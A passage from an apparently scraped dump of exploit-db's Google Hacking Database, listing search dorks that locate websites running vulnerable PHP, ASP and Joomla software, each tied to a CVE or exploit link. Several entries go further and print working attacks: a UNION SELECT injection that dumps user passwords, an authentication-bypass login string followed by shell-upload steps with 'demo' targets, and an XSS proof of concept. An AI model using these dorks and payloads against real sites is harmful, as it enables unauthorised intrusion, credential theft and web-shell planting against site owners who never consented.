<textualDescription>JobSite Professional 2.0 file.php Remote SQL Injection Vulnerability - CVE: 2007-5785: https://www.exploit-db.com/exploits/4576</textualDescription>
<query>inurl:index.php?page=en_jobseekers</query>
<querystring>https://www.google.com/search?q=inurl:index.php%3Fpage%3Den_jobseekers</querystring>
<edb>https://www.exploit-db.com/exploits/4576</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1718</id>
<link>https://www.exploit-db.com/ghdb/1718</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?page=img Powered By Mini File Host</shortDescription>
<textualDescription>Mini File Host 1.x Arbitrary PHP File Upload Vulnerability - CVE: 2008-6785: https://www.exploit-db.com/exploits/7509</textualDescription>
<query>inurl:index.php?page=img Powered By Mini File Host</query>
<querystring>https://www.google.com/search?q=inurl:index.php%3Fpage%3Dimg+Powered+By+Mini+File+Host</querystring>
<edb>https://www.exploit-db.com/exploits/7509</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2939</id>
<link>https://www.exploit-db.com/ghdb/2939</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:index.php?title=gamepage</shortDescription>
<textualDescription>PHP Gamepage SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12634</textualDescription>
<query>inurl:index.php?title=gamepage</query>
<querystring>https://www.google.com/search?q=inurl%3Aindex.php%3Ftitle%3Dgamepage</querystring>
<edb>https://www.exploit-db.com/exploits/12634</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2524</id>
<link>https://www.exploit-db.com/ghdb/2524</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:indexmess.php</shortDescription>
<textualDescription>Messagerie Locale (centre.php) Remote File Inclusion Vulnerability: https://www.exploit-db.com/exploits/2832</textualDescription>
<query>inurl:indexmess.php</query>
<querystring>https://www.google.com/search?q=inurl:indexmess.php</querystring>
<edb>https://www.exploit-db.com/exploits/2832</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1254</id>
<link>https://www.exploit-db.com/ghdb/1254</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:install.pl intitle:GTchat</shortDescription>
<textualDescription>Gtchat install file.You can disable the chat program or change the language without a admin username or password. You can also point the chatroom information to a different URL in theory using a crosscript to take over the the chatroom.</textualDescription>
<query>inurl:install.pl intitle:GTchat</query>
<querystring>https://www.google.com/search?q=inurl:install.pl+intitle:GTchat+&amp;hs=yTH&amp;safe=off&amp;rls=org.mozilla:en-US:official&amp;filter=0</querystring>
<edb></edb>
<date>2006-01-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>2172</id>
<link>https://www.exploit-db.com/ghdb/2172</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:JBSPro</shortDescription>
<textualDescription>JiRos Banner Experience 1.0 (Create Admin Bypass) - CVE: 2006-1213: https://www.exploit-db.com/exploits/1571</textualDescription>
<query>inurl:JBSPro</query>
<querystring>https://www.google.com/search?q=inurl:JBSPro</querystring>
<edb>https://www.exploit-db.com/exploits/1571</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1796</id>
<link>https://www.exploit-db.com/ghdb/1796</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:jgs_treffen.php</shortDescription>
<textualDescription>Woltlab Burning Board Addon JGS-Treffen SQL Injection Vulnerability - CVE: 2008-1640: https://www.exploit-db.com/exploits/5329</textualDescription>
<query>inurl:jgs_treffen.php</query>
<querystring>https://www.google.com/search?q=inurl:jgs_treffen.php</querystring>
<edb>https://www.exploit-db.com/exploits/5329</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2777</id>
<link>https://www.exploit-db.com/ghdb/2777</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:K-Search, Powered By K-Search</shortDescription>
<textualDescription>K-Search (SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2010-2457: https://www.exploit-db.com/exploits/13993</textualDescription>
<query>inurl:K-Search, Powered By K-Search</query>
<querystring>https://www.google.com/search?q=inurl:K-Search,+Powered+By+K-Search</querystring>
<edb>https://www.exploit-db.com/exploits/13993</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1800</id>
<link>https://www.exploit-db.com/ghdb/1800</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:makaledetay.asp?id=</shortDescription>
<textualDescription>Mayasan Portal v2.0 (makaledetay.asp) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14420</textualDescription>
<query>inurl:makaledetay.asp?id=</query>
<querystring>https://www.google.com/search?q=inurl:makaledetay.asp%3Fid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/14420</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2874</id>
<link>https://www.exploit-db.com/ghdb/2874</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:module=My_eGallery pid</shortDescription>
<textualDescription>MDPro Module My_eGallery (pid) Remote SQL Injection - CVE: 2009-0728: https://www.exploit-db.com/exploits/8100</textualDescription>
<query>inurl:module=My_eGallery pid</query>
<querystring>https://www.google.com/search?q=inurl%3Amodule%3DMy_eGallery+pid</querystring>
<edb>https://www.exploit-db.com/exploits/8100</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2066</id>
<link>https://www.exploit-db.com/ghdb/2066</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:modules.php?name=Shopping_Cart</shortDescription>
<textualDescription>PHP-Nuke Module Emporium 2.3.0 (id_catg) SQL Injection Vulnerability - CVE: 2007-1034: https://www.exploit-db.com/exploits/10615</textualDescription>
<query>inurl:modules.php?name=Shopping_Cart</query>
<querystring>https://www.google.com/search?q=inurl:modules.php%3Fname%3DShopping_Cart</querystring>
<edb>https://www.exploit-db.com/exploits/10615</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2748</id>
<link>https://www.exploit-db.com/ghdb/2748</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:modules.php?op= &quot;pollID&quot;</shortDescription>
<textualDescription>MD-Pro 1.083.x Survey Module (pollID) Blind SQL Injection Vulnerability - CVE: 2009-2618: https://www.exploit-db.com/exploits/9021</textualDescription>
<query>inurl:modules.php?op= &quot;pollID&quot;</query>
<querystring>https://www.google.com/search?q=inurl:modules.php%3Fop%3D+%22pollID%22</querystring>
<edb>https://www.exploit-db.com/exploits/9021</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1523</id>
<link>https://www.exploit-db.com/ghdb/1523</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:modules/flashgames/</shortDescription>
<textualDescription>XOOPS Flashgames Module 1.0.1 Remote SQL Injection Vulnerability - CVE: 2007-2543: https://www.exploit-db.com/exploits/3849</textualDescription>
<query>inurl:modules/flashgames/</query>
<querystring>https://www.google.com/search?q=inurl:modules/flashgames/</querystring>
<edb>https://www.exploit-db.com/exploits/3849</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3432</id>
<link>https://www.exploit-db.com/ghdb/3432</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:naviid + inurl:liste9</shortDescription>
<textualDescription>Aiyoota! CMS - Blind SQL Injection: https://www.exploit-db.com/exploits/7490</textualDescription>
<query>inurl:naviid + inurl:liste9</query>
<querystring>https://www.google.com/search?q=inurl:naviid+%2B+inurl:liste9</querystring>
<edb>https://www.exploit-db.com/exploits/7490</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2446</id>
<link>https://www.exploit-db.com/ghdb/2446</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:news.php?mode=voir</shortDescription>
<textualDescription>TR News 2.1 (nb) Remote SQL Injection Vulnerability - CVE: 2008-1957: https://www.exploit-db.com/exploits/5483</textualDescription>
<query>inurl:news.php?mode=voir</query>
<querystring>https://www.google.com/search?q=inurl:news.php%3Fmode%3Dvoir</querystring>
<edb>https://www.exploit-db.com/exploits/5483</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6678</id>
<link>https://www.exploit-db.com/ghdb/6678</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:opac_css</shortDescription>
<textualDescription># Google Dork: inurl:opac_css
# PMB 5.6 - 'chemin' Local File Disclosure.
# https://www.exploit-db.com/exploits/49054
# Date: 17/11/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:opac_css</query>
<querystring>https://www.google.com/search?q=inurl:opac_css</querystring>
<edb></edb>
<date>2020-11-17</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>2998</id>
<link>https://www.exploit-db.com/ghdb/2998</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:option=articles artid</shortDescription>
<textualDescription>Mambo Component Articles (artid) Blind SQL Injection: https://www.exploit-db.com/exploits/5935</textualDescription>
<query>inurl:option=articles artid</query>
<querystring>https://www.google.com/search?q=inurl:option%3Darticles+artid</querystring>
<edb>https://www.exploit-db.com/exploits/5935</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3113</id>
<link>https://www.exploit-db.com/ghdb/3113</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:option=com_agenda</shortDescription>
<textualDescription>Joomla Component com_agenda 1.0.1 (id) SQL Injection Vulnerability - CVE: 2010-1716: https://www.exploit-db.com/exploits/12132</textualDescription>
<query>inurl:option=com_agenda</query>
<querystring>https://www.google.com/search?q=inurl:option%3Dcom_agenda</querystring>
<edb>https://www.exploit-db.com/exploits/12132</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3005</id>
<link>https://www.exploit-db.com/ghdb/3005</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:option=com_cinema</shortDescription>
<textualDescription>Joomla component cinema SQL injection Vulnerability: https://www.exploit-db.com/exploits/13792</textualDescription>
<query>inurl:option=com_cinema</query>
<querystring>https://www.google.com/search?q=inurl:option%3Dcom_cinema</querystring>
<edb>https://www.exploit-db.com/exploits/13792</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2722</id>
<link>https://www.exploit-db.com/ghdb/2722</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:option=com_education_classes</shortDescription>
<textualDescription>joomla component education SQL injection Vulnerability: https://www.exploit-db.com/exploits/12153</textualDescription>
<query>inurl:option=com_education_classes</query>
<querystring>https://www.google.com/search?q=inurl:option%3Dcom_education_classes</querystring>
<edb>https://www.exploit-db.com/exploits/12153</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2805</id>
<link>https://www.exploit-db.com/ghdb/2805</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:option=com_huruhelpdesk</shortDescription>
<textualDescription>joomla component allvideos BLIND SQL injection Vulnerability: https://www.exploit-db.com/exploits/12137</textualDescription>
<query>inurl:option=com_huruhelpdesk</query>
<querystring>https://www.google.com/search?q=inurl:option%3Dcom_huruhelpdesk</querystring>
<edb>https://www.exploit-db.com/exploits/12137</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2846</id>
<link>https://www.exploit-db.com/ghdb/2846</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:option=com_huruhelpdesk</shortDescription>
<textualDescription>joomla component huruhelpdesk SQL injection Vulnerability: https://www.exploit-db.com/exploits/12124</textualDescription>
<query>inurl:option=com_huruhelpdesk</query>
<querystring>https://www.google.com/search?q=inurl%3Aoption%3Dcom_huruhelpdesk</querystring>
<edb>https://www.exploit-db.com/exploits/12124</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3157</id>
<link>https://www.exploit-db.com/ghdb/3157</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:option=com_mv_restaurantmenumanager</shortDescription>
<textualDescription>Joomla component mv_restaurantmenumanager SQL injection Vulnerability: https://www.exploit-db.com/exploits/12162</textualDescription>
<query>inurl:option=com_mv_restaurantmenumanager</query>
<querystring>https://www.google.com/search?q=inurl:option%3Dcom_mv_restaurantmenumanager</querystring>
<edb>https://www.exploit-db.com/exploits/12162</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2004</id>
<link>https://www.exploit-db.com/ghdb/2004</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:option=com_mydyngallery</shortDescription>
<textualDescription>Joomla Component mydyngallery 1.4.2 (directory) SQL Injection Vuln - CVE: 2008-5957: https://www.exploit-db.com/exploits/7343</textualDescription>
<query>inurl:option=com_mydyngallery</query>
<querystring>https://www.google.com/search?q=inurl:option%3Dcom_mydyngallery</querystring>
<edb>https://www.exploit-db.com/exploits/7343</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3128</id>
<link>https://www.exploit-db.com/ghdb/3128</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:option=com_n-forms form_id</shortDescription>
<textualDescription>Mambo Component n-form (form_id) Blind SQL Injection: https://www.exploit-db.com/exploits/7064</textualDescription>
<query>inurl:option=com_n-forms form_id</query>
<querystring>https://www.google.com/search?q=inurl:option%3Dcom_n-forms+form_id</querystring>
<edb>https://www.exploit-db.com/exploits/7064</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3630</id>
<link>https://www.exploit-db.com/ghdb/3630</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:page.php?intPageID=</shortDescription>
<textualDescription>Submitter: Srblche SQL Injection: http://server/page.php?intPageID=[SQL]</textualDescription>
<query>inurl:page.php?intPageID=</query>
<querystring>https://www.google.com/search?q=inurl:page.php%3FintPageID%3D</querystring>
<edb></edb>
<date>2010-12-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>3646</id>
<link>https://www.exploit-db.com/ghdb/3646</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:panorama-viewer.php?id=</shortDescription>
<textualDescription>[-] http://server/panorama-viewer.php?id=-1+UNION+SELECT+1,2,3,group_concat%28user_name,0x3a,user_pwd%29,5,6+from+mc_users--
[-] http://server/adm/users.php
[-] http://server/adm/panorama_edit.php?id=1
[-] http://server/listimages/shell.php
#################################################################
Great 2 : : h4m1d /sheisebaboo / vc.emliter / Neo / H-SK33PY / Net.Editor /
HUrr!c4nE / Cair3x /novin security team and all iranian hackers
#################################################################</textualDescription>
<query>inurl:panorama-viewer.php?id=</query>
<querystring>https://www.google.com/search?q=inurl:panorama-viewer.php?id=</querystring>
<edb></edb>
<date>2010-12-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>1331</id>
<link>https://www.exploit-db.com/ghdb/1331</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:perldiver.cgi ext:cgi</shortDescription>
<textualDescription>dork: inurl:perldiver.cgi ext:cgi some interesting info about server and a cross site scripting vulnerability, poc: http://[target]/[path]/cgi-bin/perldiver.cgi?action=20&amp;alert(&quot;lol&quot;)other reference:http://secunia.com/advisories/16888/</textualDescription>
<query>inurl:perldiver.cgi ext:cgi</query>
<querystring>https://www.google.com/search?q=inurl%3Aperldiver.cgi+ext%3Acgi+&amp;btnG=Cerca+con+Google&amp;meta=&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2006-04-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>5900</id>
<link>https://www.exploit-db.com/ghdb/5900</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:php-bin/webclient.php</shortDescription>
<textualDescription># Google Dork: inurl:php-bin/webclient.php
# By using this dork, sites vulnerable to 0day Alcatel-Lucent Omnivista
8770 - Remote Code Execution, can be found. This dork is linked to the
following existing exploit: https://www.exploit-db.com/exploits/47761
# Date: 07/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>inurl:php-bin/webclient.php</query>
<querystring>https://www.google.com/search?q=inurl:php-bin/webclient.php</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>3483</id>
<link>https://www.exploit-db.com/ghdb/3483</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:php-stats.js.php</shortDescription>
<textualDescription>Php-Stats 0.1.9.1b (php-stats-options.php) admin 2 exec() - CVE: 2006-7173: https://www.exploit-db.com/exploits/3502</textualDescription>
<query>inurl:php-stats.js.php</query>
<querystring>https://www.google.com/search?q=inurl:php-stats.js.php</querystring>
<edb>https://www.exploit-db.com/exploits/3502</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3417</id>
<link>https://www.exploit-db.com/ghdb/3417</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:pmwiki.php +&quot;Page last modified on&quot; | PmWikiPhilosophy</shortDescription>
<textualDescription>PmWiki</textualDescription>
<query>inurl:pmwiki.php +&quot;Page last modified on&quot; | PmWikiPhilosophy</query>
<querystring>https://www.google.com/search?q=inurl:pmwiki.php+%2B%22Page+last+modified+on%22+|+PmWikiPhilosophy</querystring>
<edb></edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2219</id>
<link>https://www.exploit-db.com/ghdb/2219</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:post.php?Category=Garage</shortDescription>
<textualDescription>GarageSales Remote Upload Vulnerability: https://www.exploit-db.com/exploits/12128</textualDescription>
<query>inurl:post.php?Category=Garage</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:post.php%3FCategory%3DGarage</querystring>
<edb>https://www.exploit-db.com/exploits/12128</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2746</id>
<link>https://www.exploit-db.com/ghdb/2746</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:profile.php?mode=</shortDescription>
<textualDescription>PHPBB MOD [2.0.19] Invitation Only (PassCode Bypass vulnerability): https://www.exploit-db.com/exploits/14440</textualDescription>
<query>inurl:profile.php?mode=</query>
<querystring>https://www.google.com/search?q=inurl:profile.php%3Fmode%3D</querystring>
<edb>https://www.exploit-db.com/exploits/14440</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3007</id>
<link>https://www.exploit-db.com/ghdb/3007</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:prog.php?dwkodu=</shortDescription>
<textualDescription>Kolifa.net Download Script 1.2 (id) SQL Injection Vulnerability - CVE: 2008-4054: https://www.exploit-db.com/exploits/6310</textualDescription>
<query>inurl:prog.php?dwkodu=</query>
<querystring>https://www.google.com/search?q=inurl:prog.php%3Fdwkodu%3D</querystring>
<edb>https://www.exploit-db.com/exploits/6310</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2512</id>
<link>https://www.exploit-db.com/ghdb/2512</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:questions.php?idcat</shortDescription>
<textualDescription>EsFaq 2.0 (idcat) Remote SQL Injection Vulnerability - CVE: 2008-3952: https://www.exploit-db.com/exploits/6383</textualDescription>
<query>inurl:questions.php?idcat</query>
<querystring>https://www.google.com/search?q=inurl:questions.php%3Fidcat</querystring>
<edb>https://www.exploit-db.com/exploits/6383</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>7240</id>
<link>https://www.exploit-db.com/ghdb/7240</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:quicklinks.aspx</shortDescription>
<textualDescription># Google Dorks : inurl:quicklinks.aspx
# Advisories and Vulnerabilities
# Date: 07/23/2021
#Author: Abishekraghav Murugeashan
</textualDescription>
<query>inurl:quicklinks.aspx</query>
<querystring>https://www.google.com/search?q=inurl:quicklinks.aspx</querystring>
<edb></edb>
<date>2021-09-16</date>
<author>Abishekraghav Murugeashan</author>
</entry>
<entry>
<id>1709</id>
<link>https://www.exploit-db.com/ghdb/1709</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:quizinfo.php</shortDescription>
<textualDescription>PHP-MySQL-Quiz SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10876</textualDescription>
<query>inurl:quizinfo.php</query>
<querystring>https://www.google.com/search?q=inurl:quizinfo.php</querystring>
<edb>https://www.exploit-db.com/exploits/10876</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1784</id>
<link>https://www.exploit-db.com/ghdb/1784</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:ratelink.php?lnkid=</shortDescription>
<textualDescription>Link Trader (lnkid) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10834</textualDescription>
<query>inurl:ratelink.php?lnkid=</query>
<querystring>https://www.google.com/search?q=inurl:ratelink.php%3Flnkid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/10834</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2920</id>
<link>https://www.exploit-db.com/ghdb/2920</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:ratelink.php?lnkid=</shortDescription>
<textualDescription>Link Trader (ratelink.php lnkid) Remote SQL Injection Vulnerability - CVE: 2008-6102: https://www.exploit-db.com/exploits/6650</textualDescription>
<query>inurl:ratelink.php?lnkid=</query>
<querystring>https://www.google.com/search?q=inurl%3Aratelink.php%3Flnkid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/6650</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>5744</id>
<link>https://www.exploit-db.com/ghdb/5744</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:ReportViewer.aspx</shortDescription>
<textualDescription>Dork: inurl:ReportViewer.aspx
Date: 19 Feb 2020
Author: rhinofense.com
Search for SSRS servers vulnerable to RCE (CVE-2020-0618)</textualDescription>
<query>inurl:ReportViewer.aspx</query>
<querystring>https://www.google.com/search?q=inurl:ReportViewer.aspx</querystring>
<edb></edb>
<date>2020-02-20</date>
<author>rhinofense.com</author>
</entry>
<entry>
<id>1340</id>
<link>https://www.exploit-db.com/ghdb/1340</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:resetcore.php ext:php</shortDescription>
<textualDescription>e107 is a content management system written in php and using the popular open source mySQL database system for content storage. It's completely free and totally customisable, and in constant development.rgods exploit:http://retrogod.altervista.org/e107remote.html</textualDescription>
<query>inurl:resetcore.php ext:php</query>
<querystring>https://www.google.com/search?q=%22Warning:+Division+by+zero+in%22+%22on+line%22+-forum&amp;num=100&amp;start=0&amp;sa=N</querystring>
<edb></edb>
<date>2006-04-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>3354</id>
<link>https://www.exploit-db.com/ghdb/3354</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:roschedule.php</shortDescription>
<textualDescription>phpScheduleIt 1.2.10 (reserve.php) Remote Code Execution - CVE: 2008-6132: https://www.exploit-db.com/exploits/6646</textualDescription>
<query>inurl:roschedule.php</query>
<querystring>https://www.google.com/search?q=inurl:roschedule.php</querystring>
<edb>https://www.exploit-db.com/exploits/6646</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>4398</id>
<link>https://www.exploit-db.com/ghdb/4398</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:sendmessage.php?type=skype</shortDescription>
<textualDescription>Dork to find Joomla JMS Support Online Module Reflected XSS (skype module)
Type: Reflected XSS
Vulnerable URL:http://localhost/[PATH]/sendmessage.php
Vulnerable Parameters: ?type=skype&amp;user=&amp;skype=
Method: GET
Payload: &quot;&gt;</textualDescription>
<query>inurl:sendmessage.php?type=skype</query>
<querystring>https://www.google.com/search?q=inurl:sendmessage.php?type=skype</querystring>
<edb></edb>
<date>2017-02-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>1326</id>
<link>https://www.exploit-db.com/ghdb/1326</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:server.php ext:php intext:&quot;No SQL&quot; -Released</shortDescription>
<textualDescription>vulnerabilitydiscovered by Secunia, quick reference:http://www.securityfocus.com/bid/16187an example of exploit for PHPOpenChat:http://retrogod.altervista.org/phpopenchat_30x_sql_xpl.htmla DOS exploit:http://retrogod.altervista.org/adodb_dos.html</textualDescription>
<query>inurl:server.php ext:php intext:&quot;No SQL&quot; -Released</query>
<querystring>https://www.google.com/search?q=inurl:server.php+ext:php++intext:%22No+SQL%22+-Released&amp;num=100&amp;start=0&amp;sa=N&amp;filter=0</querystring>
<edb></edb>
<date>2006-04-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>4312</id>
<link>https://www.exploit-db.com/ghdb/4312</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:sgms/auth</shortDescription>
<textualDescription>inurl:sgms/auth
This will allow you to find Sonicwall GMS servers.
This article mentions 6 vulnerabilities recently found.
https://www.digitaldefense.com/vrt-discoveries/</textualDescription>
<query>inurl:sgms/auth</query>
<querystring>https://www.google.com/search?q=inurl:sgms/auth</querystring>
<edb></edb>
<date>2016-07-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>3647</id>
<link>https://www.exploit-db.com/ghdb/3647</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:showcat.asp?id=</shortDescription>
<textualDescription>========================================
Centralia (admin/dbedit.asp?) Bypass and Shell Upload Vulnerability
========================================
#################################################################
# Exploit : Centralia (admin/dbedit.asp?) Bypass and File Upload Vulnerability
# Date : 10 December 2010
# Author : ali.erroor
# Version : n/a
# Googel DorK : inurl:showcat.asp?id=
# Home : www.network-security.ir
# Email : ali.erroor@att.net
#################################################################
[+] Exploit
[1] Centralia (admin/dbedit.asp?) Bypass and File Upload Vulnerability..
[-] http://localhost/path/admin/dbedit.asp?table=products
[-] username : 'or''='
[-] password : 'or''='
[2] Create New Upload Your Shell.Asp ..
[-] http://localhost/path/admin/dbedit.asp?a=upload_init
[3] To See Shell Edit Your uploads
[-] http://localhost/path/uploads/shell;asp.jpg
[+] Demo
[-] http://server/admin/dbedit.asp?table=products
[-] http://server/admin/dbedit.asp?a=upload_init
#################################################################
Great 2 : : h4m1d /sheisebaboo / vc.emliter / H-SK33PY / Net.Editor / HUrr!c4nE
/ Cair3x /novin security team and all iranian hackers
#################################################################</textualDescription>
<query>inurl:showcat.asp?id=</query>
<querystring>https://www.google.com/search?q=inurl:showcat.asp?id=</querystring>
<edb></edb>
<date>2010-12-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>983</id>
<link>https://www.exploit-db.com/ghdb/983</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:sphpblog intext:&quot;Powered by Simple PHP Blog 0.4.0&quot;</shortDescription>
<textualDescription>simple PHP Blog is vulnerable to mutiple attacks:Vulnerabilities:~~~~~~~~~~~~~~~~A. Full Path disclosuresB. XSS in search.phpC. Critical Information dislosures http://www.securityfocus.com/archive/1/395994</textualDescription>
<query>inurl:sphpblog intext:&quot;Powered by Simple PHP Blog 0.4.0&quot;</query>
<querystring>https://www.google.com/search?safe=off&amp;q=inurl%3Asphpblog+intext%3A%22Powered+by+Simple+PHP+Blog+0.4.0%22</querystring>
<edb></edb>
<date>2005-05-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>1330</id>
<link>https://www.exploit-db.com/ghdb/1330</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:sysinfo.cgi ext:cgi</shortDescription>
<textualDescription>dork:inurl:sysinfo.cgi ext:cgi exploit: http://www.milw0rm.com/exploits/1677 I found this command execution vulnerability in 1.2.1 but other versions maybe vulnerable toohowever, u can see version in google results</textualDescription>
<query>inurl:sysinfo.cgi ext:cgi</query>
<querystring>https://www.google.com/search?q=inurl%3Asysinfo.cgi+ext%3Acgi+&amp;btnG=Cerca+con+Google&amp;meta=&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2006-04-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3423</id>
<link>https://www.exploit-db.com/ghdb/3423</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:sysinfo.cgi ext:cgi</shortDescription>
<textualDescription>SysInfo 1.21 (sysinfo.cgi) Remote Command Execution - CVE: 2006-1831: https://www.exploit-db.com/exploits/1677</textualDescription>
<query>inurl:sysinfo.cgi ext:cgi</query>
<querystring>https://www.google.com/search?q=inurl:sysinfo.cgi+ext:cgi</querystring>
<edb>https://www.exploit-db.com/exploits/1677</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2225</id>
<link>https://www.exploit-db.com/ghdb/2225</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:tabid/176/Default.aspx OR inurl:portals/0/</shortDescription>
<textualDescription>DotNetNuke Remote File upload Vulnerability: https://www.exploit-db.com/exploits/12700</textualDescription>
<query>inurl:tabid/176/Default.aspx OR inurl:portals/0/</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:tabid/176/Default.aspx+OR+inurl:portals/0/</querystring>
<edb>https://www.exploit-db.com/exploits/12700</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>668</id>
<link>https://www.exploit-db.com/ghdb/668</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:technote inurl:main.cgi*filename=*</shortDescription>
<textualDescription>http://www.securityfocus.com/bid/2156/discussion/ Remote command execution vulnerability in the filename parameter.</textualDescription>
